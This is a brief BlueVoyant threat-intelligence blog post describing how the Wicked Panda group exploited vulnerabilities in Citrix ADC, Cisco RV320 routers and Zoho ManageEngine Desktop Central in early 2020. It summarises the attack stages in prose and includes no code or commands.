Wicked Panda Exploiting New Vulnerabilities

May 14, 2020 | 2 min read

BlueVoyant

“Life in the SOC” is a Blog Series that shares experiences of the BlueVoyant SOC defending against the current and prevalent attacks encountered by our clients. The blogs discuss successful detection, response and mitigation actions that can improve your defensive capabilities.

Wicked Panda is a prolific cyber threat group that carries out Chinese state-sponsored espionage activity. They also carry out financially motivated activity often outside of state control. Wicked Panda typically employs spear-phishing emails with malicious attachments for the initial compromise of an attack. After gaining access to a victim organization, they leverage more sophisticated TTPs (Tactics, Techniques and Procedures) and deploy additional malware.

Since the beginning of 2020, Wicked Panda has carried out a number of different campaigns making use of the major vulnerability releases from the last year. From late January to late March, it was observed attempting to exploit vulnerabilities in three major devices/tools: Citrix NetScaler / Application Delivery Controller (ADC), a Cisco router, and Zoho ManageEngine Desktop Central.

The devices can be found in a number of different industries from Banking/Finance and Healthcare to Telecommunications and Utilities. It’s unclear if Wicked Panda scanned the internet and attempted mass exploitation or targeted a subset of specific organizations. The victims appear to be more targeted in nature.

Citrix ADC (CVE-2019-19781)
CVE-2019-19781 allows any unauthorized attacker to access published applications, as well as attack other resources on the company’s internal network from the Citrix server. In this campaign, Wicked Panda cybercriminals initially exploited the vulnerability by first testing if targeted systems had employed Citrix published mitigation steps (configuration changes) until a patch was available. Then they deployed a backdoor on the systems. A new wave of attack used the vulnerability to exploit payloads that initiated a File Transfer Protocol (FTP) download in order to pull down a backdoor. This activity continued all the way through to the end of March with the only major difference being the name of the payload being pulled.

Cisco Routers
In mid February, Wicked Panda was seen exploiting a Cisco RV320 router (Cisco’s WAN VPN routers for small businesses) at a telecom organization. Post exploitation, the threat actors downloaded both an executable and binary payload. Researchers aren’t sure what specific exploit was used, but pointed to a Metasploit module combining two CVEs (CVE- 2019-1653 and CVE-2019-1652) to enable remote code execution on Cisco RV320 and RV325 small business routers.

Zoho ManageEngine Desktop Central (CVE-2020-10189)
Zoho ManageEngine Desktop Central is an endpoint management tool to help users manage their servers, laptops, smartphones, and more from a central location. The flaw (CVE-2020-10189) was first disclosed on March 5th as a zero-day, and was later patched on March 7. On March 8, the threat actors exploited the flaw to deploy payloads in one of two ways. First, after
exploiting the flaw they directly uploaded a simple Java-based program containing a set of commands. The commands then used PowerShell to download and execute the payloads. In a second attack, Wicked Panda leveraged a legitimate Microsoft command-line tool, BITSAdmin, to
download the payload.